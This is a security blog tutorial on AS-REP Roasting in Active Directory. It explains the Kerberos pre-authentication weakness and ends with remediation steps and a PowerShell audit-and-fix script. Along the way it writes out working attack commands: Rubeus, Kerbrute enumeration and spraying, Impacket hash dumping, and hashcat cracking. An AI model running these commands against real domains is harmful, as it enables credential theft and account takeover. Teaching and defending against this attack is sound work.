
What is As-Rep Roasting attack in Active Directory and How does it work?

Discover how attackers exploit Kerberos vulnerabilities through As-Rep Roasting, learn step-by-step techniques for identifying and preventing this attack, and strengthen your network security.

by FOUNDER
August 19, 2025

What is As-Rep Roasting Attack?

As-Rep Roasting is an attack technique that targets Kerberos in environments where Pre-Authentication is disabled.

When Pre-Authentication is disabled, an attacker can request an Authentication Service response message (AS-REP) for a user without needing to prove knowledge of that user's password. The Key Distribution Center (KDC) responds with the AS-REP, part of which is encrypted with a key derived from the user's password. The attacker can then attempt to crack that part offline with tools like hashcat or John the Ripper, revealing the user's password.

 

How to identify vulnerable As-Rep Roast accounts in Active Directory?

In a Windows Active Directory (AD) environment, an attacker can use tools like PowerShell to search for accounts where Pre-Authentication is not enforced. These accounts have the UF_DONT_REQUIRE_PREAUTH flag (decimal 4194304) set in their userAccountControl attribute, so a bitwise AND against that value finds them:

Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

How to create vulnerable AS-Rep Roasting Account?

System administrators may create vulnerable accounts by disabling Pre-Authentication for specific users.

Step 1: Open Server Manager and navigate to Active Directory Users and Computers.
Step 2: Select the user account properties.
Step 3: Under the Account tab, check the option for Do not require Kerberos preauthentication.
Step 4: Apply the changes.

What are the tools used for performing As-Rep Roasting attack?

1. Rubeus

Rubeus is a command-line tool written in C# to abuse Kerberos authentication in Windows Active Directory environments.

Rubeus.exe asreproast /domain:YourDomainName.local

This command will request AS-REPs for vulnerable accounts and output their encrypted credential hashes, which can be used for offline cracking.

2. Kerbrute 

Kerbrute is another tool designed for brute-forcing and enumerating user accounts in Kerberos environments. It can also be used to exploit As-Rep Roasting vulnerabilities.

Kerbrute has four main commands:

  1. bruteuser – Bruteforce a single user’s password from a wordlist
  2. bruteforce – Read username:password combos from a file or stdin and test them
  3. passwordspray – Test a single password against a list of users
  4. userenum – Enumerate valid domain usernames via Kerberos

./kerbrute_linux_amd64 userenum -d 'server.local' --dc 10.0.0.203 ~/wordlists/user.txt

3. Impacket

Impacket is a Python library that ships with scripts for testing weaknesses in a wide variety of network protocols. The GetNPUsers.py script can be used to exploit As-Rep Roasting.

On Kali Linux, the Impacket example scripts are located by default in /usr/share/doc/python3-impacket/examples/.

Identify the vulnerable As-Rep roast accounts using Impacket.

python3 GetNPUsers.py -userfile username.txt -dc-ip 10.0.0.203 server.local/

Dump the password hashes for the vulnerable As-Rep roast accounts.

python3 GetNPUsers.py -userfile username.txt -request -dc-ip 10.0.0.203 "server.local/"

 

How to crack the hash?

Once the attacker obtains the AS-REP encrypted data, it can be brute-forced offline using tools like Hashcat.

hashcat -m 18200 hash.txt wordlist.txt -o Cracked.txt

The -m 18200 parameter specifies the mode for Kerberos 5 AS-REP hashes. If successful, this process will reveal the plaintext password for the user.

How to stop As-Rep Roast attack?

Step 1: Identify the vulnerable accounts

Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

Step 2: Open Server Manager and navigate to Active Directory Users and Computers.
Step 3: Select the user account properties.
Step 4: Under the Account tab, uncheck the option for Do not require Kerberos preauthentication.
Step 5: Apply the changes.
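
The identification and remediation steps above can also be done in bulk from PowerShell. The script below is an added example, not part of the original article: it assumes the ActiveDirectory (RSAT) module is installed and that the operator has rights to modify the affected users. The function names Get-NoPreAuthAccount and Enable-PreAuth are hypothetical helpers defined here.

```powershell
# Added example: audit and remediate accounts that do not require
# Kerberos pre-authentication. Function names are hypothetical helpers.
Import-Module ActiveDirectory

# UF_DONT_REQUIRE_PREAUTH bit in userAccountControl (decimal 4194304)
$DontReqPreAuth = 0x400000

function Get-NoPreAuthAccount {
    # Same bitmask filter the article uses, plus properties useful for triage:
    # when the password was last set, last logon, and whether the account
    # is (or was) a member of a protected group (adminCount = 1).
    Get-ADUser -Filter "userAccountControl -band $DontReqPreAuth" `
               -Properties userAccountControl, PasswordLastSet, LastLogonDate, adminCount |
        Select-Object SamAccountName, Enabled, PasswordLastSet, LastLogonDate,
            @{ Name = 'Privileged'; Expression = { $_.adminCount -eq 1 } },
            DistinguishedName
}

function Enable-PreAuth {
    # Clears "Do not require Kerberos preauthentication" on each piped account.
    # Supports -WhatIf / -Confirm so the change can be reviewed before it is made.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]
        [string]$DistinguishedName
    )
    process {
        if ($PSCmdlet.ShouldProcess($DistinguishedName, 'Require Kerberos pre-authentication')) {
            Set-ADAccountControl -Identity $DistinguishedName -DoesNotRequirePreAuth $false
        }
    }
}

# 1. Report: privileged accounts first, since they matter most.
$findings = Get-NoPreAuthAccount
$findings | Sort-Object Privileged -Descending | Format-Table -AutoSize

# 2. Dry run: shows which accounts would be changed without changing them.
#    Remove -WhatIf to apply the fix.
$findings | Enable-PreAuth -WhatIf
```

After clearing the flag, reset the password of every account that was listed: an AS-REP captured while the flag was set can still be cracked offline.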

 

Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].

 
